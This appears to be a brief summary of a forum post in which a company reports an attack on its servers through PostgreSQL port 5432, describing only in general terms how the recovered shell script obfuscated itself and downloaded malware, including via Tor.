Cyber Attack Targets PostgreSQL Port 5432 Despite Firewall Protections

The author reports that their company experienced a cyber attack via port 5432 (PostgreSQL) on nearly all their servers, despite local networks being protected by iptables. A network team contact provided the malicious script, which downloads and executes malware using multiple methods, including connections through Tor proxies. The shell script employs obfuscated names, redirects outputs to /dev/null, checks its own execution, and attempts four different methods to download the final malware, which was found to be compiled binary code.